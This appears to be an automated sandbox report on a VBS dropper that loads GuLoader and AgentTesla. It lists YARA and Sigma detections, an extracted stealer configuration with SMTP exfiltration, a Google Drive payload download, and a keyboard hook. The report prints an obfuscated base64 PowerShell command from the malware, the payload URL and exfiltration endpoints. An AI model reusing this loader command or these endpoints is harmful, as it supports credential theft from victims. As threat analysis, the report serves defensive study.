Source	Rule	Description	Author	Strings
0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x167de:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
0000001A.00000000.1970106356.0000000001350000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x16862:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000002.2220743788.0000000009E20000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000014.00000002.2103587544.0000000004C30000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x4886:$xc3: 4A 41 42 70 41 44 30 41
00000014.00000002.2099293106.0000000003010000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x8a16:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000002.2096104717.0000000002EDA000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x1984c:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41 0x20304:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000003.1512001892.0000000002F62000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x9066:$xc3: 4A 41 42 70 41 44 30 41
0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000014.00000003.1609777781.00000000086AD000.00000004.00000800.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x70d0:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000002.2094575687.0000000002E90000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0xf33d:$xc3: 4A 41 42 70 41 44 30 41 0x23d0e:$xc3: 4A 41 42 70 41 44 30 41 0x2db56:$xc3: 4A 41 42 70 41 44 30 41 0xaa8e:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000002.2098442263.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x66:$xc3: 4A 41 42 70 41 44 30 41
00000014.00000002.2100345664.0000000003290000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x8ba0:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
00000014.00000003.1523532169.0000000002F6B000.00000004.00000020.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x66:$xc3: 4A 41 42 70 41 44 30 41
00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x8b14:$xc4: 4A 00 41 00 42 00 70 00 41 00 44 00 30 00 41
Process Memory Space: powershell.exe PID: 9092	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0xed8a7:$xc3: 4A 41 42 70 41 44 30 41 0xf1568:$xc3: 4A 41 42 70 41 44 30 41 0xf4b08:$xc3: 4A 41 42 70 41 44 30 41 0x103377:$xc3: 4A 41 42 70 41 44 30 41 0x10956c:$xc3: 4A 41 42 70 41 44 30 41 0x10cac1:$xc3: 4A 41 42 70 41 44 30 41 0x14682c:$xc3: 4A 41 42 70 41 44 30 41 0x149dcc:$xc3: 4A 41 42 70 41 44 30 41 0x16d205:$xc3: 4A 41 42 70 41 44 30 41 0x199a9c:$xc3: 4A 41 42 70 41 44 30 41 0x19d736:$xc3: 4A 41 42 70 41 44 30 41 0x1a0cde:$xc3: 4A 41 42 70 41 44 30 41 0x1a61e4:$xc3: 4A 41 42 70 41 44 30 41 0x1a9784:$xc3: 4A 41 42 70 41 44 30 41 0x1ad828:$xc3: 4A 41 42 70 41 44 30 41 0x1b0dc8:$xc3: 4A 41 42 70 41 44 30 41 0x220d9c:$xc3: 4A 41 42 70 41 44 30 41 0x24c144:$xc3: 4A 41 42 70 41 44 30 41 0x24c3fb:$xc3: 4A 41 42 70 41 44 30 41 0x268a2a:$xc3: 4A 41 42 70 41 44 30 41 0x26a838:$xc3: 4A 41 42 70 41 44 30 41
Process Memory Space: CasPol.exe PID: 6564	SUSP_PS1_JAB_Pattern_Jun22_1	Detects suspicious UTF16 and Base64 encoded PowerShell code that starts with a $ sign and a single char variable	Florian Roth	0x45aff:$xc3: 4A 41 42 70 41 44 30 41
Process Memory Space: CasPol.exe PID: 6564	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 6564	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 15 entries

Sigma Signatures

Data Obfuscation

Sigma detected: Dot net compiler compiles file from suspicious location

Source: Process started

Author: Joe Security: Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline, CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sepi5xx1\sepi5xx1.cmdline, CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -NoExit -EncodedCommand "JABNAGkAbABqAHYAcgBuAGUAdABsACAAPQAgAEAAJwANAAoASQBtACQASABhAHUAUwB0AHYAQQBzAG8ARwByAHIARgBpADkAVABpACAAQgBpAD0AYQBmACAAQQBmACIAQQBmAFYARABpAGkAUgBlAHIAUwBwAHQAQQBmAHUATABvAGEAUgBlAGwASwBhAEEAUAB0AGwAQQBnAGwAUgBlAG8AUgBlAGMAUABoACIACgBTAHQAQQBLAG8AZABDAGgAZABMAHUALQBCAG8AVABJAGQAeQBsAGUAcABSAGkAZQBBAG4AIABlAHEALQBTAGsAVABOAGUAeQBVAG4AcABFAHMAZQBTAHQARABDAGEAZQBPAHAAZgBWAGUAaQBQAG8AbgBEAGUAaQBJAGQAdABTAHQAaQBBAHQAbwBOAG8AbgBLAGUAIABDAGgAQABWAGUAIgAKAHUAZAB1AEYAbwBzAFIAZQBpAEEAawBuAGEAZgBnAEEAcwAgAEwAZQBTAE8AcAB5AEMAeQBzAFMAZQB0AEQAaQBlAEEAbgBtAFAAcgA7AAoAdABpAHUARgBhAHMAQQBwAGkASQBuAG4AbwBwAGcASQBuACAAQgBhAFMATwBwAHkAQQBrAHMAVQBuAHQAVgBpAGUATQBlAG0AVgBlAC4AdgBlAFIAbwB2AHUAQwBvAG4AZQB4AHQAVABhAGkARABpAG0ATABhAGUAUwB0AC4AVgBlAEkAQgBpAG4ASwBvAHQARwBvAGUAQwBpAHIAQQBuAG8ARgBsAHAAWQBvAFMAVABoAGUAVQBuAHIAZQBpAHYAVQBkAGkARwBzAGMAUwBoAGUAUgBvAHMAUABsADsACgBPAHAAcABTAHkAdQBSAGEAYgBGAGEAbABNAGEAaQBXAGkAYwB1AG4AIABBAHUAcwBJAG4AdABQAG8AYQBVAHAAdABTAGEAaQBHAHIAYwBEAG8AIABzAGsAYwByAGkAbABNAGkAYQBXAG8AcwBGAHIAcwBpAG4AIABTAHQAQwBHAGkAbABWAG8AYQBTAHUAZABJAG4AbwBNAHkAZwBHAHQAZQBTAHQAbgBBAHIAZQBGAGEAdABMAG8AMQAKAFMAcAB7AEEAcwBbAEcAbgBEAGIAZQBsAFUAbgBsAEIAdQBJAEYAeQBtAEQAbwBwAEYAYQBvAFYAZQByAFQAcgB0AFUAbgAoAFAAaAAiAEsAZQB1AFUAaQBzAFMAdQBlAFAAcwByAEYAbgAzAEEAcAAyAHMAawAiAHQAcgApAEcAcgBdAEUAbgBwAFAAaQB1AE8AcABiAFMAdABsAHMAYQBpAFMAcABjAFYAaQAgAFMAdQBzAFAAbwB0AEgAYQBhAFMAawB0AEIAZQBpAFMAYwBjAFUAbgAgAEQAaQBlAEUAcgB4AFAAdQB0AFMAdgBlAEEAcgByAFcAYQBuAEkAbgAgAEcAZwBpAFAAZQBuAE0AYQB0AFUAbgAgAHQAcgBDAFAAaQByAEEAYQBlAEQAZQBhAFMAbAB0AFMAdABlAEsAbABNAEIAdQBEAFAAbABJAGkAbgBXAFUAbgBpAEUAbABuAHMAdABkAFIAZQBvAFYAYQB3AE0AYQAoAEwAYQBpAEEAbgBuAFMAawB0AFMAdAAgAEIAZQBOAEYAbAB2AFUAbgBoAEkAcgBpAEUAbQBlAEMAbwAsAEEAbgBpAEMAaABuAFAAcgB0AEQAaQAgAEYAbwBIAEwAYQBlAEsAbABhAEIAZQAsAGQAcgBpAFQAYQBuAEYAbwB0AEIAZQAgAFIAZQBoAFAAYQBhAEYAbwB0AGEAZgBjAEIAcgBoAFQAcgAsAEwAYQBpAEIAcgBuAEYAbwB0AFQAZQAgAFUAbgBQAFQAbwBpAEIAbwBuAE0AYQBpAEQAaQAsAE0AZQBpAE4AbwBuAEYAagB0AEMAaAAgAGQAdQBPAE0AYQB2AEgAZQBlAE8AcgByAFMAYQBpAFMAbAAsAEYAbwBpAE4AYQBuAHIAZQB0AE8AdgAgAFAAZQBSAHUAbgBlAEEAbgBjAE8AYgBpAE0AbwB0AEUAbABhAHAAYQAsAFIAZQBpAFMAYQBuAEMAYQB0AEgAYQAgAFAAcgBPAEcAbwBwAEEAdQBrAFMAbgByAE4AbwAsAEIAcgBpAG0AYQBuAEkAbgB0AEQAYQAgAEEAdQBDAFIAaQByAFAAcgBvAEgAYQBjAEgAZQBrAHMAawAsAGEAawBpAFIAdQBuAEgAeQB0AE0AZQAgAE0AYQBBAFAAaAB1AE4AYQB0AFkAbwBvAEEAcwBzAFMAZAAsAEcAdQBpAEEAZgBuAEEAcAB0AFMAawAg

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: PUMP mt310143121.vbs

Virustotal: Detection: 8%

Perma Link

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

Avira URL Cloud: Label: malware

Source: CasPol.exe.6376.25.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "SMTP Info": "COCO_.zipCookieapplication/zip-f \\Data\\Tor\\torrcp=127.0.0.1POST+%2Bapplication/x-www-form-urlencoded"}

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C286B0 CryptUnprotectData,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 26_2_20C286AB CryptUnprotectData,

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49808 version: TLS 1.2

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View

IP Address: 216.218.206.36 216.218.206.36

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614/*/1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-9o-docs.googleusercontent.comConnection: Keep-Alive

Source: global traffic

TCP traffic: 192.168.11.20:49809 -> 216.218.206.36:587

Source: global traffic

TCP traffic: 192.168.11.20:49809 -> 216.218.206.36:587

Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49808
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49807

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 0000001A.00000002.5763111867.000000001DC24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C
Source: CasPol.exe, 0000001A.00000002.5763111867.000000001DC24000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2266408532.0000000021054000.00000004.00000800.00020000.00000000.sdmp, Cookies.26.dr	String found in binary or memory: .www.linkedin.combscookie/ equals www.linkedin.com (Linkedin)
Source: Cookies.26.dr	String found in binary or memory: .www.linkedin.combscookiev10 equals www.linkedin.com (Linkedin)

Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://AzAPmg.com
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000014.00000002.2098055991.0000000002F49000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2072070066.0000000001507000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5724658892.0000000001500000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2066142998.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5814855176.0000000021096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: CasPol.exe, 0000001A.00000002.5814855176.0000000021096000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5813910311.000000002107C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: powershell.exe, 00000014.00000002.2098055991.0000000002F49000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5724658892.0000000001500000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2066142998.00000000014F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.prgisi.com
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5813910311.000000002107C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: CasPol.exe, 0000001A.00000002.5768599298.000000001DCE6000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5766354780.000000001DCAA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a1BgY4r4bA.com
Source: CasPol.exe, 0000001A.00000002.5768599298.000000001DCE6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://a1BgY4r4bA.comt-
Source: powershell.exe, 00000014.00000002.2105674011.0000000005081000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%mail.prgisi.comjcvaleroso
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: CasPol.exe, 0000001A.00000003.2072435740.000000000151A000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5716278615.00000000014A8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-04-9o-docs.googleusercontent.com/
Source: CasPol.exe, 0000001A.00000002.5720812627.00000000014D9000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2072883437.0000000001531000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000003.2066142998.00000000014F1000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5727289842.0000000001531000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://doc-04-9o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6h
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHCb
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHCt
Source: CasPol.exe, 0000001A.00000002.5709673241.0000000001460000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/y
Source: powershell.exe, 00000014.00000002.2110609148.00000000051DD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 0000001A.00000002.5792175882.000000001E096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 0000001A.00000002.5792175882.000000001E096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 0000001A.00000002.5792175882.000000001E096000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: powershell.exe, 00000014.00000002.2162404364.00000000060E3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: CasPol.exe, 0000001A.00000002.5814855176.0000000021096000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS
Source: CasPol.exe, 0000001A.00000002.5767667401.000000001DCCC000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5813910311.000000002107C000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5799781459.000000001FD31000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000001A.00000002.5815557538.00000000210BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: CasPol.exe, 0000001A.00000002.5760332639.000000001DBC3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: CasPol.exe, 0000001A.00000002.5758113775.000000001DB71000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: drive.google.com

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/eo32nv6hlr1tkp3eh3vjbce1k0vd1dfr/1664806350000/11764323936253178614/*/1PlMJJbtOYPK_UFYPas9qhiHRn_ix8EHC?e=download&uuid=b16c09ae-0bb5-4390-9a1a-296b303d6b25 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-04-9o-docs.googleusercontent.comConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.11.20:49807 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49808 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window created: window name: CLIPBRDWNDCLASS

System Summary

Wscript starts Powershell (via cmd or directly)

